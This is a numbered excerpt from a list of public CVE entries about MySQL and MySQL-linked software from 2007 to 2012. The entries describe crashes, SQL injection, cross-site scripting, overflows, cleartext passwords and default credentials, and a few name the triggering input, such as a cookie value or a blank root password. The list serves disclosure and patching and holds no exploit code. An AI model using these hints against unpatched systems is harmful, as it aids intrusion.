18914| [CVE-2012-0487] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0486, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
18915| [CVE-2012-0486] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0117, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
18916| [CVE-2012-0485] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, and CVE-2012-0492.
18917| [CVE-2012-0484] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect confidentiality via unknown vectors.
18918| [CVE-2012-0120] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0119, CVE-2012-0485, and CVE-2012-0492.
18919| [CVE-2012-0119] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0115, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
18920| [CVE-2012-0118] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0113.
18921| [CVE-2012-0117] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0486, CVE-2012-0487, CVE-2012-0488, CVE-2012-0489, CVE-2012-0491, CVE-2012-0493, and CVE-2012-0495.
18922| [CVE-2012-0116] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
18923| [CVE-2012-0115] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0112, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
18924| [CVE-2012-0114] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows local users to affect confidentiality and integrity via unknown vectors.
18925| [CVE-2012-0113] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect confidentiality and availability via unknown vectors, a different vulnerability than CVE-2012-0118.
18926| [CVE-2012-0112] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0115, CVE-2012-0119, CVE-2012-0120, CVE-2012-0485, and CVE-2012-0492.
18927| [CVE-2012-0102] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0101.
18928| [CVE-2012-0101] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0087 and CVE-2012-0102.
18929| [CVE-2012-0087] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x and 5.1.x allows remote authenticated users to affect availability via unknown vectors, a different vulnerability than CVE-2012-0101 and CVE-2012-0102.
18930| [CVE-2012-0075] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.0.x, 5.1.x, and 5.5.x allows remote authenticated users to affect integrity via unknown vectors.
18931| [CVE-2011-5049] MySQL 5.5.8, when running on Windows, allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted packet to TCP port 3306.
18932| [CVE-2011-4959] SQL injection vulnerability in the addslashes method in SilverStripe 2.3.x before 2.3.12 and 2.4.x before 2.4.6, when connected to a MySQL database using far east character encodings, allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
18933| [CVE-2011-4899] ** DISPUTED ** wp-admin/setup-config.php in the installation component in WordPress 3.3.1 and earlier does not ensure that the specified MySQL database service is appropriate, which allows remote attackers to configure an arbitrary database via the dbhost and dbname parameters, and subsequently conduct static code injection and cross-site scripting (XSS) attacks via (1) an HTTP request or (2) a MySQL query. NOTE: the vendor disputes the significance of this issue
18934| [CVE-2011-4898] ** DISPUTED ** wp-admin/setup-config.php in the installation component in WordPress 3.3.1 and earlier generates different error messages for requests lacking a dbname parameter depending on whether the MySQL credentials are valid, which makes it easier for remote attackers to conduct brute-force attacks via a series of requests with different uname and pwd parameters. NOTE: the vendor disputes the significance of this issue
18935| [CVE-2011-3989] SQL injection vulnerability in DBD::mysqlPP 0.04 and earlier allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
18936| [CVE-2011-3805] TaskFreak! multi-mysql-0.6 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by include/language/zh/register_info.php and certain other files.
18937| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
18938| [CVE-2011-2531] Prosody 0.8.x before 0.8.1, when MySQL is used, assigns an incorrect data type to the value column in certain tables, which might allow remote attackers to cause a denial of service (data truncation) by sending a large amount of data.
18939| [CVE-2011-2262] Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.1.x and 5.5.x allows remote attackers to affect availability via unknown vectors.
18940| [CVE-2011-1906] Trustwave WebDefend Enterprise before 5.0 7.01.903-1.4 stores specific user-account credentials in a MySQL database, which makes it easier for remote attackers to read the event collection table via requests to the management port, a different vulnerability than CVE-2011-0756.
18941| [CVE-2011-1513] Static code injection vulnerability in install_.php in e107 CMS 0.7.24 and probably earlier versions, when the installation script is not removed, allows remote attackers to inject arbitrary PHP code into e107_config.php via a crafted MySQL server name.
18942| [CVE-2011-0432] Multiple SQL injection vulnerabilities in the get_userinfo method in the MySQLAuthHandler class in DAVServer/mysqlauth.py in PyWebDAV before 0.9.4.1 allow remote attackers to execute arbitrary SQL commands via the (1) user or (2) pw argument. NOTE: some of these details are obtained from third party information.
18943| [CVE-2010-5104] The escapeStrForLike method in TYPO3 4.2.x before 4.2.16, 4.3.x before 4.3.9, and 4.4.x before 4.4.5 does not properly escape input when the MySQL database is set to sql_mode NO_BACKSLASH_ESCAPES, which allows remote attackers to obtain sensitive information via wildcard characters in a LIKE query.
18944| [CVE-2010-4822] core/model/MySQLDatabase.php in SilverStripe 2.4.x before 2.4.4, when the site is running in "live mode," allows remote attackers to obtain the SQL queries for a page via the showqueries and ajax parameters.
18945| [CVE-2010-4700] The set_magic_quotes_runtime function in PHP 5.3.2 and 5.3.3, when the MySQLi extension is used, does not properly interact with use of the mysqli_fetch_assoc function, which might make it easier for context-dependent attackers to conduct SQL injection attacks via crafted input that had been properly handled in earlier PHP versions.
18946| [CVE-2010-3840] The Gis_line_string::init_from_wkb function in sql/spatial.cc in MySQL 5.1 before 5.1.51 allows remote authenticated users to cause a denial of service (server crash) by calling the PolyFromWKB function with Well-Known Binary (WKB) data containing a crafted number of (1) line strings or (2) line points.
18947| [CVE-2010-3839] MySQL 5.1 before 5.1.51 and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (infinite loop) via multiple invocations of a (1) prepared statement or (2) stored procedure that creates a query with nested JOIN statements.
18948| [CVE-2010-3838] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via a query that uses the (1) GREATEST or (2) LEAST function with a mixed list of numeric and LONGBLOB arguments, which is not properly handled when the function's result is "processed using an intermediate temporary table."
18949| [CVE-2010-3837] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via a prepared statement that uses GROUP_CONCAT with the WITH ROLLUP modifier, probably triggering a use-after-free error when a copied object is modified in a way that also affects the original object.
18950| [CVE-2010-3836] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (assertion failure and server crash) via vectors related to view preparation, pre-evaluation of LIKE predicates, and IN Optimizers.
18951| [CVE-2010-3835] MySQL 5.1 before 5.1.51 and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (mysqld server crash) by performing a user-variable assignment in a logical expression that is calculated and stored in a temporary table for GROUP BY, then causing the expression value to be used after the table is created, which causes the expression to be re-evaluated instead of accessing its value from the table.
18952| [CVE-2010-3834] Unspecified vulnerability in MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 allows remote authenticated users to cause a denial of service (server crash) via vectors related to "materializing a derived table that required a temporary table for grouping" and "user variable assignments."
18953| [CVE-2010-3833] MySQL 5.0 before 5.0.92, 5.1 before 5.1.51, and 5.5 before 5.5.6 does not properly propagate type errors, which allows remote attackers to cause a denial of service (server crash) via crafted arguments to extreme-value functions such as (1) LEAST and (2) GREATEST, related to KILL_BAD_DATA and a "CREATE TABLE ... SELECT."
18954| [CVE-2010-3683] Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 sends an OK packet when a LOAD DATA INFILE request generates SQL errors, which allows remote authenticated users to cause a denial of service (mysqld daemon crash) via a crafted request.
18955| [CVE-2010-3682] Oracle MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using EXPLAIN with crafted "SELECT ... UNION ... ORDER BY (SELECT ... WHERE ...)" statements, which triggers a NULL pointer dereference in the Item_singlerow_subselect::store function.
18956| [CVE-2010-3681] Oracle MySQL 5.1 before 5.1.49 and 5.5 before 5.5.5 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by using the HANDLER interface and performing "alternate reads from two indexes on a table," which triggers an assertion failure.
18957| [CVE-2010-3680] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (mysqld daemon crash) by creating temporary tables with nullable columns while using InnoDB, which triggers an assertion failure.
18958| [CVE-2010-3679] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (mysqld daemon crash) via certain arguments to the BINLOG command, which triggers an access of uninitialized memory, as demonstrated by valgrind.
18959| [CVE-2010-3678] Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (crash) via (1) IN or (2) CASE operations with NULL arguments that are explicitly specified or indirectly provided by the WITH ROLLUP modifier.
18960| [CVE-2010-3677] Oracle MySQL 5.1 before 5.1.49 and 5.0 before 5.0.92 allows remote authenticated users to cause a denial of service (mysqld daemon crash) via a join query that uses a table with a unique SET column.
18961| [CVE-2010-3676] storage/innobase/dict/dict0crea.c in mysqld in Oracle MySQL 5.1 before 5.1.49 allows remote authenticated users to cause a denial of service (assertion failure) by modifying the (1) innodb_file_format or (2) innodb_file_per_table configuration parameters for the InnoDB storage engine, then executing a DDL statement.
18962| [CVE-2010-3064] Stack-based buffer overflow in the php_mysqlnd_auth_write function in the Mysqlnd extension in PHP 5.3 through 5.3.2 allows context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long (1) username or (2) database name argument to the (a) mysql_connect or (b) mysqli_connect function.
18963| [CVE-2010-3063] The php_mysqlnd_read_error_from_line function in the Mysqlnd extension in PHP 5.3 through 5.3.2 does not properly calculate a buffer length, which allows context-dependent attackers to trigger a heap-based buffer overflow via crafted inputs that cause a negative length value to be used.
18964| [CVE-2010-3062] mysqlnd_wireprotocol.c in the Mysqlnd extension in PHP 5.3 through 5.3.2 allows remote attackers to (1) read sensitive memory via a modified length value, which is not properly handled by the php_mysqlnd_ok_read function
18965| [CVE-2010-3056] Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin 2.11.x before 2.11.10.1 and 3.x before 3.3.5.1 allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) db_search.php, (2) db_sql.php, (3) db_structure.php, (4) js/messages.php, (5) libraries/common.lib.php, (6) libraries/database_interface.lib.php, (7) libraries/dbi/mysql.dbi.lib.php, (8) libraries/dbi/mysqli.dbi.lib.php, (9) libraries/db_info.inc.php, (10) libraries/sanitizing.lib.php, (11) libraries/sqlparser.lib.php, (12) server_databases.php, (13) server_privileges.php, (14) setup/config.php, (15) sql.php, (16) tbl_replace.php, and (17) tbl_sql.php.
18966| [CVE-2010-2008] MySQL before 5.1.48 allows remote authenticated users with alter database privileges to cause a denial of service (server crash and database loss) via an ALTER DATABASE command with a #mysql50# string followed by a . (dot), .. (dot dot), ../ (dot dot slash) or similar sequence, and an UPGRADE DATA DIRECTORY NAME command, which causes MySQL to move certain directories to the server data directory.
18967| [CVE-2010-2003] Cross-site scripting (XSS) vulnerability in misc/get_admin.php in Advanced Poll 2.08 allows remote attackers to inject arbitrary web script or HTML via the mysql_host parameter.
18968| [CVE-2010-1865] Multiple SQL injection vulnerabilities in ClanSphere 2009.0.3 and earlier allow remote attackers to execute arbitrary SQL commands via (1) the IP address to the cs_getip function in generate.php in the Captcha module, or (2) the s_email parameter to the cs_sql_select function in the MySQL database driver (mysql.php).
18969| [CVE-2010-1850] Buffer overflow in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote authenticated users to execute arbitrary code via a COM_FIELD_LIST command with a long table name.
18970| [CVE-2010-1849] The my_net_skip_rest function in sql/net_serv.cc in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote attackers to cause a denial of service (CPU and bandwidth consumption) by sending a large number of packets that exceed the maximum length.
18971| [CVE-2010-1848] Directory traversal vulnerability in MySQL 5.0 through 5.0.91 and 5.1 before 5.1.47 allows remote authenticated users to bypass intended table grants to read field definitions of arbitrary tables, and on 5.1 to read or delete content of arbitrary tables, via a .. (dot dot) in a table name.
18972| [CVE-2010-1626] MySQL before 5.1.46 allows local users to delete the data and index files of another user's MyISAM table via a symlink attack in conjunction with the DROP TABLE command, a different vulnerability than CVE-2008-4098 and CVE-2008-7247.
18973| [CVE-2010-1621] The mysql_uninstall_plugin function in sql/sql_plugin.cc in MySQL 5.1 before 5.1.46 does not check privileges before uninstalling a plugin, which allows remote attackers to uninstall arbitrary plugins via the UNINSTALL PLUGIN command.
18974| [CVE-2010-1583] SQL injection vulnerability in the loadByKey function in the TznDbConnection class in tzn_mysql.php in Tirzen (aka TZN) Framework 1.5, as used in TaskFreak! before 0.6.3, allows remote attackers to execute arbitrary SQL commands via the username field in a login action.
18975| [CVE-2010-0336] Unspecified vulnerability in the kiddog_mysqldumper (kiddog_mysqldumper) extension 0.0.3 and earlier for TYPO3 allows remote attackers to obtain sensitive information via unknown attack vectors.
18976| [CVE-2010-0124] Employee Timeclock Software 0.99 places the database password on the mysqldump command line, which allows local users to obtain sensitive information by listing the process.
18977| [CVE-2009-5026] The executable comment feature in MySQL 5.0.x before 5.0.93 and 5.1.x before 5.1.50, when running in certain slave configurations in which the slave is running a newer version than the master, allows remote attackers to execute arbitrary SQL commands via custom comments.
18978| [CVE-2009-4833] MySQL Connector/NET before 6.0.4, when using encryption, does not verify SSL certificates during connection, which allows remote attackers to perform a man-in-the-middle attack with a spoofed SSL certificate.
18979| [CVE-2009-4484] Multiple stack-based buffer overflows in the CertDecoder::GetName function in src/asn.cpp in TaoCrypt in yaSSL before 1.9.9, as used in mysqld in MySQL 5.0.x before 5.0.90, MySQL 5.1.x before 5.1.43, MySQL 5.5.x through 5.5.0-m2, and other products, allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption and daemon crash) by establishing an SSL connection and sending an X.509 client certificate with a crafted name field, as demonstrated by mysql_overflow1.py and the vd_mysql5 module in VulnDisco Pack Professional 8.11. NOTE: this was originally reported for MySQL 5.0.51a.
18980| [CVE-2009-4030] MySQL 5.1.x before 5.1.41 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL data home directory, related to incorrect calculation of the mysql_unpacked_real_data_home value. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079.
18981| [CVE-2009-4028] The vio_verify_callback function in viosslfactories.c in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41, when OpenSSL is used, accepts a value of zero for the depth of X.509 certificates, which allows man-in-the-middle attackers to spoof arbitrary SSL-based MySQL servers via a crafted certificate, as demonstrated by a certificate presented by a server linked against the yaSSL library.
18982| [CVE-2009-4019] mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.
18983| [CVE-2009-3696] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.11.x before 2.11.9.6 and 3.x before 3.2.2.1 allows remote attackers to inject arbitrary web script or HTML via a crafted name for a MySQL table.
18984| [CVE-2009-3102] The doHotCopy subroutine in socket-server.pl in Zmanda Recovery Manager (ZRM) for MySQL 2.x before 2.1.1 allows remote attackers to execute arbitrary commands via vectors involving a crafted $MYSQL_BINPATH variable.
18985| [CVE-2009-2942] The mysql-ocaml bindings 1.0.4 for MySQL do not properly support the mysql_real_escape_string function, which might allow remote attackers to leverage escaping issues involving multibyte character encodings.
18986| [CVE-2009-2446] Multiple format string vulnerabilities in the dispatch_command function in libmysqld/sql_parse.cc in mysqld in MySQL 4.0.0 through 5.0.83 allow remote authenticated users to cause a denial of service (daemon crash) and possibly have unspecified other impact via format string specifiers in a database name in a (1) COM_CREATE_DB or (2) COM_DROP_DB request. NOTE: some of these details are obtained from third party information.
18987| [CVE-2009-1246] Multiple directory traversal vulnerabilities in Blogplus 1.0 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the (1) row_mysql_blocks_center_down[file] parameter to includes/block_center_down.php
18988| [CVE-2009-1208] SQL injection vulnerability in auth2db 0.2.5, and possibly other versions before 0.2.7, uses the addslashes function instead of the mysql_real_escape_string function, which allows remote attackers to conduct SQL injection attacks using multibyte character encodings.
18989| [CVE-2009-0919] XAMPP installs multiple packages with insecure default passwords, which makes it easier for remote attackers to obtain access via (1) the "lampp" default password for the "nobody" account within the included ProFTPD installation, (2) a blank default password for the "root" account within the included MySQL installation, (3) a blank default password for the "pma" account within the phpMyAdmin installation, and possibly other unspecified passwords. NOTE: this was originally reported as a problem in DFLabs PTK, but this issue affects any product that is installed within the XAMPP environment, and should not be viewed as a vulnerability within that product. NOTE: DFLabs states that PTK is intended for use in a laboratory with "no contact from / to internet."
18990| [CVE-2009-0819] sql/item_xmlfunc.cc in MySQL 5.1 before 5.1.32 and 6.0 before 6.0.10 allows remote authenticated users to cause a denial of service (crash) via "an XPath expression employing a scalar expression as a FilterExpr with ExtractValue() or UpdateXML()," which triggers an assertion failure.
18991| [CVE-2009-0617] Cisco Application Networking Manager (ANM) before 2.0 uses a default MySQL root password, which makes it easier for remote attackers to execute arbitrary operating-system commands or change system files.
18992| [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
18993| [CVE-2008-7247] sql/sql_table.cc in MySQL 5.0.x through 5.0.88, 5.1.x through 5.1.41, and 6.0 before 6.0.9-alpha, when the data home directory contains a symlink to a different filesystem, allows remote authenticated users to bypass intended access restrictions by calling CREATE TABLE with a (1) DATA DIRECTORY or (2) INDEX DIRECTORY argument referring to a subdirectory that requires following this symlink.
18994| [CVE-2008-6992] GreenSQL Firewall (greensql-fw), possibly before 0.9.2 or 0.9.4, allows remote attackers to bypass the SQL injection protection mechanism via a WHERE clause containing an expression such as "x=y=z", which is successfully parsed by MySQL.
18995| [CVE-2008-6813] SQL injection vulnerability in index.php in phpWebNews 0.2 MySQL Edition allows remote attackers to execute arbitrary SQL commands via the id_kat parameter.
18996| [CVE-2008-6812] SQL injection vulnerability in bukutamu.php in phpWebNews 0.2 MySQL Edition allows remote attackers to execute arbitrary SQL commands via the det parameter.
18997| [CVE-2008-6655] Multiple cross-site scripting (XSS) vulnerabilities in GEDCOM_TO_MYSQL 2 allow remote attackers to inject arbitrary web script or HTML via the (1) nom_branche and (2) nom parameters to php/prenom.php
18998| [CVE-2008-6287] Multiple PHP remote file inclusion vulnerabilities in Broadcast Machine 0.1 allow remote attackers to execute arbitrary PHP code via a URL in the baseDir parameter to (1) MySQLController.php, (2) SQLController.php, (3) SetupController.php, (4) VideoController.php, and (5) ViewController.php in controllers/.
18999| [CVE-2008-6193] Sam Crew MyBlog stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information.
19000| [CVE-2008-5847] Constructr CMS 3.02.5 and earlier stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information by reading the hash column.
19001| [CVE-2008-5738] Nodstrum MySQL Calendar 1.1 and 1.2 allows remote attackers to bypass authentication and gain administrative access by setting the nodstrumCalendarV2 cookie to 1. NOTE: some of these details are obtained from third party information.
19002| [CVE-2008-5737] SQL injection vulnerability in index.php in Nodstrum MySQL Calendar 1.1 and 1.2 allows remote attackers to execute arbitrary SQL commands via the username parameter.
19003| [CVE-2008-5069] SQL injection vulnerability in go.php in Panuwat PromoteWeb MySQL, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the id parameter.
19004| [CVE-2008-4456] Cross-site scripting (XSS) vulnerability in the command-line client in MySQL 5.0.26 through 5.0.45, and other versions including versions later than 5.0.45, when the --html option is enabled, allows attackers to inject arbitrary web script or HTML by placing it in a database cell, which might be accessed by this client when composing an HTML document. NOTE: as of 20081031, the issue has not been fixed in MySQL 5.0.67.
19005| [CVE-2008-4455] Directory traversal vulnerability in index.php in EKINdesigns MySQL Quick Admin 1.5.5 and earlier, when magic_quotes_gpc is disabled, allows remote attackers to read and execute arbitrary files via a .. (dot dot) in the language cookie.
19006| [CVE-2008-4454] Directory traversal vulnerability in EKINdesigns MySQL Quick Admin 1.5.5 allows remote attackers to read and execute arbitrary files via a .. (dot dot) in the lang parameter to actions.php. NOTE: the provenance of this information is unknown
19007| [CVE-2008-4180] Unspecified vulnerability in db.php in NooMS 1.1 allows remote attackers to conduct brute force attacks against passwords via a username in the g_dbuser parameter and a password in the g_dbpwd parameter, and possibly a "localhost" g_dbhost parameter value, related to a "Mysql Remote Brute Force Vulnerability."
19008| [CVE-2008-4106] WordPress before 2.6.2 does not properly handle MySQL warnings about insertion of username strings that exceed the maximum column width of the user_login column, and does not properly handle space characters when comparing usernames, which allows remote attackers to change an arbitrary user's password to a random value by registering a similar username and then requesting a password reset, related to a "SQL column truncation vulnerability." NOTE: the attacker can discover the random password by also exploiting CVE-2008-4107.
19009| [CVE-2008-4098] MySQL before 5.0.67 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL home data directory. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4097.
19010| [CVE-2008-4097] MySQL 5.0.51a allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are associated with symlinks within pathnames for subdirectories of the MySQL home data directory, which are followed when tables are created in the future. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-2079.
19011| [CVE-2008-3963] MySQL 5.0 before 5.0.66, 5.1 before 5.1.26, and 6.0 before 6.0.6 does not properly handle a b'' (b single-quote single-quote) token, aka an empty bit-string literal, which allows remote attackers to cause a denial of service (daemon crash) by using this token in a SQL statement.
19012| [CVE-2008-3846] Cross-site scripting (XSS) vulnerability in mysql-lists 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
19013| [CVE-2008-3840] Crafty Syntax Live Help (CSLH) 2.14.6 and earlier stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information.
19014| [CVE-2008-3820] Cisco Security Manager 3.1 and 3.2 before 3.2.2, when Cisco IPS Event Viewer (IEV) is used, exposes TCP ports used by the MySQL daemon and IEV server, which allows remote attackers to obtain "root access" to IEV via unspecified use of TCP sessions to these ports.
19015| [CVE-2008-3582] SQL injection vulnerability in login.php in Keld PHP-MySQL News Script 0.7.1 allows remote attackers to execute arbitrary SQL commands via the username parameter.
19016| [CVE-2008-3090] Multiple SQL injection vulnerabilities in index.php in BlognPlus (BURO GUN +) 2.5.5 MySQL and PostgreSQL editions allow remote attackers to execute arbitrary SQL commands via the (1) p, (2) e, (3) d, and (4) m parameters, a different vulnerability than CVE-2008-2819.
19017| [CVE-2008-2881] Relative Real Estate Systems 3.0 and earlier stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information.
19018| [CVE-2008-2857] AlstraSoft AskMe Pro 2.1 and earlier stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information.
19019| [CVE-2008-2819] SQL injection vulnerability in BlognPlus (BURO GUN +) 2.5.4 and earlier MySQL and PostgreSQL editions allows remote attackers to execute arbitrary SQL commands via unspecified vectors.
19020| [CVE-2008-2667] SQL injection vulnerability in the Courier Authentication Library (aka courier-authlib) before 0.60.6 on SUSE openSUSE 10.3 and 11.0, and other platforms, when MySQL and a non-Latin character set are used, allows remote attackers to execute arbitrary SQL commands via the username and unspecified other vectors.
19021| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
19022| [CVE-2008-2079] MySQL 4.1.x before 4.1.24, 5.0.x before 5.0.60, 5.1.x before 5.1.24, and 6.0.x before 6.0.5 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are within the MySQL home data directory, which can point to tables that are created in the future.
19023| [CVE-2008-2029] Multiple SQL injection vulnerabilities in (1) setup_mysql.php and (2) setup_options.php in miniBB 2.2 and possibly earlier, when register_globals is enabled, allow remote attackers to execute arbitrary SQL commands via the xtr parameter in a userinfo action to index.php.
19024| [CVE-2008-1711] Terong PHP Photo Gallery (aka Advanced Web Photo Gallery) 1.0 stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information.
19025| [CVE-2008-1567] phpMyAdmin before 2.11.5.1 stores the MySQL (1) username and (2) password, and the (3) Blowfish secret key, in cleartext in a Session file under /tmp, which allows local users to obtain sensitive information.
19026| [CVE-2008-1486] SQL injection vulnerability in Phorum before 5.2.6, when mysql_use_ft is disabled, allows remote attackers to execute arbitrary SQL commands via the non-fulltext search.
19027| [CVE-2008-0249] PHP Webquest 2.6 allows remote attackers to retrieve database credentials via a direct request to admin/backup_phpwebquest.php, which leaks the credentials in an error message if a call to /usr/bin/mysqldump fails. NOTE: this might only be an issue in limited environments.
19028| [CVE-2008-0227] yaSSL 1.7.5 and earlier, as used in MySQL and possibly other products, allows remote attackers to cause a denial of service (crash) via a Hello packet containing a large size value, which triggers a buffer over-read in the HASHwithTransform::Update function in hash.cpp.
19029| [CVE-2008-0226] Multiple buffer overflows in yaSSL 1.7.5 and earlier, as used in MySQL and possibly other products, allow remote attackers to execute arbitrary code via (1) the ProcessOldClientHello function in handshake.cpp or (2) "input_buffer& operator>>" in yassl_imp.cpp.
19030| [CVE-2007-6512] PHP MySQL Banner Exchange 2.2.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain database information via a direct request to inc/lib.inc.
19031| [CVE-2007-6418] The libdspam7-drv-mysql cron job in Debian GNU/Linux includes the MySQL dspam database password in a command line argument, which might allow local users to read the password by listing the process and its arguments.
19032| [CVE-2007-6345] SQL injection vulnerability in aurora framework before 20071208 allows remote attackers to execute arbitrary SQL commands via unspecified vectors, possibly the value parameter to the pack_var function in module/db.lib/db_mysql.lib. NOTE: some of these details are obtained from third party information.
19033| [CVE-2007-6313] MySQL Server 5.1.x before 5.1.23 and 6.0.x before 6.0.4 does not check the rights of the entity executing BINLOG, which allows remote authorized users to execute arbitrary BINLOG statements.
19034| [CVE-2007-6304] The federated engine in MySQL 5.0.x before 5.0.51a, 5.1.x before 5.1.23, and 6.0.x before 6.0.4, when performing a certain SHOW TABLE STATUS query, allows remote MySQL servers to cause a denial of service (federated handler crash and daemon crash) via a response that lacks the minimum required number of columns.
19035| [CVE-2007-6303] MySQL 5.0.x before 5.0.51a, 5.1.x before 5.1.23, and 6.0.x before 6.0.4 does not update the DEFINER value of a view when the view is altered, which allows remote authenticated users to gain privileges via a sequence of statements including a CREATE SQL SECURITY DEFINER VIEW statement and an ALTER VIEW statement.
19036| [CVE-2007-6081] AdventNet EventLog Analyzer build 4030 for Windows, and possibly other versions and platforms, installs a mysql instance with a default "root" account without a password, which allows remote attackers to gain privileges and modify logs.
